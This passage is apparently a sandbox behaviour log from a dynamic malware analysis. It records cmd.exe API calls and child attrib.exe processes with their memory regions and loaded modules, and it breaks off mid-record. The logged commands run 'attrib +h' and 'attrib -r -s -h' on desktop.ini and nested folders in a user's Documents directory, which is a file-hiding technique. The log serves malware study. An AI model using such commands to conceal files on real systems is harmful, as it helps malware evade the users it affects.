(_String1=".EXE", _String2=".BAT") returned 3 [0128.294] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.294] GetConsoleTitleW (in: lpConsoleTitle=0x24f15c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.294] InitializeProcThreadAttributeList (in: lpAttributeList=0x24efe4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f0ac | out: lpAttributeList=0x24efe4, lpSize=0x24f0ac) returned 1 [0128.294] UpdateProcThreadAttribute (in: lpAttributeList=0x24efe4, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f0a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24efe4, lpPreviousValue=0x0) returned 1 [0128.294] GetStartupInfoW (in: lpStartupInfo=0x24efa0 | out: lpStartupInfo=0x24efa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0128.294] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.294] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f040*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f08c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" ", lpProcessInformation=0x24f08c*(hProcess=0x4c, hThread=0x50, dwProcessId=0x324, dwThreadId=0x328)) returned 1 [0128.296] CloseHandle (hObject=0x50) returned 1 [0128.296] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.296] GetEnvironmentStringsW () returned 0x442f08* [0128.296] FreeEnvironmentStringsW (penv=0x442f08) returned 1 [0128.296] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0128.338] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24ef80 | out: lpExitCode=0x24ef80*=0x0) returned 1 [0128.338] CloseHandle (hObject=0x4c) returned 1 [0128.338] _vsnwprintf (in: _Buffer=0x24f0c8, _BufferCount=0x13, _Format="%08X", _ArgList=0x24ef8c | out: _Buffer="00000000") returned 8 [0128.338] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0128.338] GetEnvironmentStringsW () returned 0x442f08* [0128.338] FreeEnvironmentStringsW (penv=0x442f08) returned 1 [0128.338] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.338] GetEnvironmentStringsW () returned 0x442f08* [0128.339] FreeEnvironmentStringsW (penv=0x442f08) returned 1 [0128.339] DeleteProcThreadAttributeList (in: lpAttributeList=0x24efe4 | out: lpAttributeList=0x24efe4) [0128.339] GetConsoleTitleW (in: lpConsoleTitle=0x24f3c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.339] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.339] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.339] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.339] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.339] GetLastError () returned 0x2 [0128.339] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.340] GetLastError () returned 0x2 [0128.340] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0x43e7e0 [0128.340] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.340] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.340] GetLastError () returned 0x2 [0128.340] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0x43e7e0 [0128.340] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.340] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0128.340] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0128.340] GetConsoleTitleW (in: lpConsoleTitle=0x24f15c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.340] InitializeProcThreadAttributeList (in: lpAttributeList=0x24efe4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f0ac | out: lpAttributeList=0x24efe4, lpSize=0x24f0ac) returned 1 [0128.340] UpdateProcThreadAttribute (in: lpAttributeList=0x24efe4, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f0a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24efe4, lpPreviousValue=0x0) returned 1 [0128.341] GetStartupInfoW (in: lpStartupInfo=0x24efa0 | out: lpStartupInfo=0x24efa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0128.341] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0128.341] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f040*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f08c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", lpProcessInformation=0x24f08c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x7ac, dwThreadId=0x488)) returned 1 [0128.343] CloseHandle (hObject=0x4c) returned 1 [0128.343] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0128.343] GetEnvironmentStringsW () returned 0x443a60* [0128.343] FreeEnvironmentStringsW (penv=0x443a60) returned 1 [0128.343] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0128.380] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24ef80 | out: lpExitCode=0x24ef80*=0x0) returned 1 [0128.380] CloseHandle (hObject=0x50) returned 1 [0128.380] _vsnwprintf (in: _Buffer=0x24f0c8, _BufferCount=0x13, _Format="%08X", _ArgList=0x24ef8c | out: _Buffer="00000000") returned 8 [0128.380] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0128.380] GetEnvironmentStringsW () returned 0x443a60* [0128.380] FreeEnvironmentStringsW (penv=0x443a60) returned 1 [0128.380] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0128.380] GetEnvironmentStringsW () returned 0x443a60* [0128.380] FreeEnvironmentStringsW (penv=0x443a60) returned 1 [0128.380] DeleteProcThreadAttributeList (in: lpAttributeList=0x24efe4 | out: lpAttributeList=0x24efe4) [0128.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.380] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.381] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.381] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.381] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.381] SetConsoleInputExeNameW () returned 0x1 [0128.381] GetConsoleOutputCP () returned 0x1b5 [0128.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.381] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.381] exit (_Code=0) Process: id = "83" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x92c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0x87c" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10547 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10548 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10549 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10550 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10551 start_va = 0xf40000 end_va = 0xf46fff entry_point = 0xf40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10552 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10553 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10554 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10555 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 10556 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10557 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10558 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10559 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10560 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 10561 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 10562 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10563 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10564 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10565 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10566 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10567 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10568 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10569 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10570 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10571 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10572 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10573 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10574 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 10575 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10576 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 140 os_tid = 0x7cc Process: id = "84" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0x87c" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10612 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10613 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10614 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10615 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10616 start_va = 0x210000 end_va = 0x216fff entry_point = 0x210000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10617 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10618 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10619 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10620 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10621 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10622 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10623 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10624 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10625 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 10626 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 10627 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10628 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10629 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10630 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10631 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10632 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10633 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10634 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10635 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10636 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10637 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10638 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10639 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 10640 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10641 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 141 os_tid = 0x328 Process: id = "85" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x7ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0x87c" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10642 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10643 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10644 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10645 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 10646 start_va = 0x2e0000 end_va = 0x2e6fff entry_point = 0x2e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10647 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10648 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10649 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10650 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 10651 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10652 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10653 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10654 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10655 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 10656 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 10657 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10658 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10659 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10660 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10661 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10662 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10663 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10664 start_va = 